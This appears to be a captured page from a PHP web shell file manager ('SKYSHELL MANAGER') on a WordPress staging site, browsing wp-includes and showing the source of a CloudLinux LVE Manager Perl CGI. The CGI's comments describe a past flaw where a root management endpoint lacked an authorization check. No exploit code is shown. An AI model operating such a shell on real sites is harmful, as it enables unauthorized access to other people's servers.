📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: CloudLinux.cgi
#!/bin/bash # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT eval 'if [ -x /usr/local/cpanel/3rdparty/bin/perl ]; then exec /usr/local/cpanel/3rdparty/bin/perl -x -- $0 ${1+"$@"}; else exec /usr/bin/perl -x -- $0 ${1+"$@"};fi' if 0; #!/usr/bin/perl # Plugin: LVE Manager VERSION:2.0 # # Location: whostmgr/docroot/cgi # Copyright(c) 2017 CloudLinux, Inc. # All rights Reserved. # http://www.cloudlinux.com # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # #Title: cPanel LVE Manager plugin. #Version: 2.0 #Site: http://cloudLinux.com # # CSRF/Referer note: # The primary CSRF defense for this CGI is provided by cPanel's cpsrvd, # which enforces a per-session URL security token # (/cpsessNNNNNNNNNN/...) that gates every authenticated request before # dispatch. Requests without a matching token are rejected with HTTP # 401 and the Perl below never executes. The token is bound to the # session record (cp_security_token in Cpanel::Session) and is not # exposed to JavaScript via cookies, so a cross-site attacker cannot # construct a valid URL. _checkVulnerabilities() (csrftoken cookie + # X-CSRFToken header + Referer match) is retained as defense in depth # but is not the load-bearing control. Authorization, however, IS # load-bearing and must be enforced in the CGI itself: the WHM # /var/cpanel/apps/lvemanager.conf "acls=software-lvemanager" # declaration only gates the WHM home-screen icon, not the CGI URL — # cpsrvd does NOT refuse requests from logged-in users without that # ACL. Therefore every state-changing handler must call # _checkPermission(). BEGIN { unshift @INC, '/usr/local/cpanel', '/usr/local/cpanel/whostmgr/docroot/3rdparty/cloudlinux', '/usr/share/l.v.e-manager/cpanel/cgi'; #use CGI::Carp qw(fatalsToBrowser); # for detail comments } use strict; use warnings; use Whostmgr::ACLS (); use Whostmgr::HTMLInterface (); use Cpanel::Template; use Cpanel::SafeRun::Errors; use Cpanel::Encoder::Tiny (); use Cpanel::Form (); use Cpanel::AcctUtils::Domain (); use JSON; use Data::Dumper qw(Dumper); use CGI; use Digest::MD5 qw(md5_hex); use Crypt::Random qw( makerandom ); use Text::Trim qw(trim); use CloudLinux; use constant DOC_ROOT => "/usr/local/cpanel/whostmgr/docroot"; use constant ASSETS_PATH => "/cgi/cloudlinux/assets"; use constant APP_MODE => 'PRODUCTION_MODE'; Whostmgr::ACLS::init_acls(); my ($cpanelRequest, $requestBody) = Cpanel::Form::parseform(undef, undef, undef, 1); my %REQUEST = CloudLinux::parseForm(%$cpanelRequest); my $cgiaction = $REQUEST{'cgiaction'} || 'default'; my $handler = $REQUEST{'handler'} || 'lvemanager'; my $cgi = new CGI; if (($cgiaction eq 'jsonhandler') and (length $requestBody > 0)) { # Reinitialize formdata without STDIN information %REQUEST = CloudLinux::parseForm(Cpanel::Form::parseform()); } CloudLinux::detectOwner(); CloudLinux::detectLocale($cgi); # knockKnock is a static liveness probe (CloudLinux.pm:160-163 returns # `{"result":"success"}`), so the unauthenticated reachable state today # leaks nothing and changes nothing. Still, having a single dispatch # action bypass _checkPermission() is a future-regression vector: the # table is the place a reviewer looks to convince themselves every # admin/reseller-CGI action goes through the same gate. Wrap the # handler so all four actions share the same authorization shape # (finding [18] — defense in depth). sub knockKnockHandler { if (!_checkPermission()) { CloudLinux::sendError('Permission denied'); } CloudLinux::knockKnock(); } my %dispatchTable = ( default => \&main, sendRequest => \&sendRequest, jsonhandler => \&jsonhandler, knockKnock => \&knockKnockHandler, ); my %handlers = ( lvemanager => \&CloudLinux::lvemanagerHandler, ); processRequest($cgiaction); sub processRequest { my ($action) = @_; $action = 'default' unless exists $dispatchTable{$action}; $dispatchTable{$action}->(); } # ============================================================================== # Rendering of index page for plugin # ============================================================================== sub main { CloudLinux::checkMethod('GET', 'POST'); sendWHMHeader(); CloudLinux::getDataContent('templates', 'index.html', 1); if (getCpanelVersion() <= 56.0) { CloudLinux::loadAssets(ASSETS_PATH, 'main', 'config', './'.ASSETS_PATH); } else { CloudLinux::loadAssets(ASSETS_PATH, 'main', 'config', '../'.ASSETS_PATH); } sendWHMFooter(); } sub defMainHeader { Whostmgr::HTMLInterface::defheader( 'CloudLinux Manager', '/images/CloudLinux_logo.png', '/cgi/CloudLinux.cgi' ); } sub defCustomHeader { Cpanel::Template::process_template( 'whostmgr', { 'print' => 1, 'template_file' => '_defheader.tmpl', 'header' => $_[0] || undef, 'icon' => $_[1] || undef, 'theme' => "yui", 'breadcrumbdata' => { 'name' => $_[0], 'url' => $_[2], 'previous' => [{ 'name' => 'Home', }] } }, ); return; } sub sendWHMHeader { # Check privileges if (!_checkPermission()) { print "Content-type: text/html\n\n"; defMainHeader(); print qq{<div align="center"> <h1>Permission denied</h1> </div>}; sendWHMFooter(); exit 0; } unless (defined $cgi->cookie('csrftoken')) { my $csrf_token = md5_hex(makerandom ( Size => 128, Strength => 0 )); print "Set-Cookie: csrftoken=$csrf_token\n"; } print "Content-type: text/html\n\n"; if(CloudLinux::_isAdmin()) { defMainHeader(); } else { defCustomHeader( 'CloudLinux Manager', '/images/CloudLinux_logo.png', '/cgi/addon_lvemanager.cgi' ); } Whostmgr::HTMLInterface::load_css(ASSETS_PATH.'/css/bootstrap.min.css'); } sub _getRandomString { return join("", map { sprintf q|%X|, rand(16) } 1 .. 10); } sub getCpanelVersion { my $version = CloudLinux::safeRun('/usr/local/cpanel/cpanel', '-V'); (my $numOfVersion) = $version =~ /^(\d[\d\.]*)\s/; return $numOfVersion; } sub sendWHMFooter { if (getCpanelVersion() >= 64.0) { Whostmgr::HTMLInterface::deffooter(); } else { print '</body></html>'; } } # ============================================================================== # Processes of incoming post request and prepare command for cloudlinux-cli # ============================================================================== sub sendRequest { _checkVulnerabilities(); # Check privileges if (!_checkPermission()) { CloudLinux::sendError('Permission denied'); } if (exists $REQUEST{'cgiaction'}) { delete $REQUEST{'cgiaction'}; } if (exists $REQUEST{'handler'}) { delete $REQUEST{'handler'}; } if (!%REQUEST) { CloudLinux::sendError('Empty dataset'); } $ENV{'LC_ALL'} = 'en_US.UTF-8'; $handler = 'lvemanager' unless exists $handlers{$handler}; $handlers{$handler}->(\%REQUEST, 'lvemanager'); } sub _checkVulnerabilities { CloudLinux::checkMethod('POST'); _checkCSRFToken(); _checkReferer(); } sub _checkCSRFToken { if (!defined $cgi->cookie('csrftoken') || $cgi->cookie('csrftoken') ne $ENV{ HTTP_X_CSRFTOKEN } ) { CloudLinux::sendError('BAD FORGERY PROTECTION TOKEN', 0, 1); } } sub _checkReferer { my $protocol = (exists $ENV{ HTTPS } && $ENV { HTTPS } eq 'on') ? 'https' : 'http'; my $ip = $ENV { HTTP_HOST }; unless ($ENV{ HTTP_REFERER } =~ qr/^$protocol:\/\/\Q$ip\E/) { CloudLinux::sendError('BAD REFERER', 0, 1); } } sub _checkPermission { if (CloudLinux::_isAdmin() || (CloudLinux::_isReseller() && _isAvailablePluginForReseller()) ) { return 1; } return 0; } sub _isAvailablePluginForReseller { if (Whostmgr::ACLS::checkacl('software-lvemanager') ) { return 1; } return 0; } sub jsonhandler { # CloudLinux::jsonHandler runs cloudlinux-cli (lvectl / cloudlinux-awp-admin # / cloudlinux-limits) as root under whostmgr. Previously this dispatch had # NO authorization check, so a WHM reseller WITHOUT the software-lvemanager # ACL (the in-CGI gate, since the WHM acls= entry only hides the icon) # could reach a root management endpoint. _checkPermission() is the # load-bearing control for that EoP. # # _checkVulnerabilities (POST + CSRF + Referer) is intentionally NOT # applied here: jsonhandler has two legitimate callers that the gate # would reject — (a) the WHM UI drives jsonhandler via browser GET with # query-string params (no body, not POST), and (b) external clients call # it with `Authorization: whm root:<token>`, which is session-less and # carries no csrftoken cookie or Referer. CSRF hardening of jsonhandler # should be a separate change that migrates the UI to POST + token and # decides explicitly how WHM-token clients fit in. if (!_checkPermission()) { CloudLinux::sendError('Permission denied'); } \&CloudLinux::jsonHandler(\%REQUEST, $requestBody); }
Save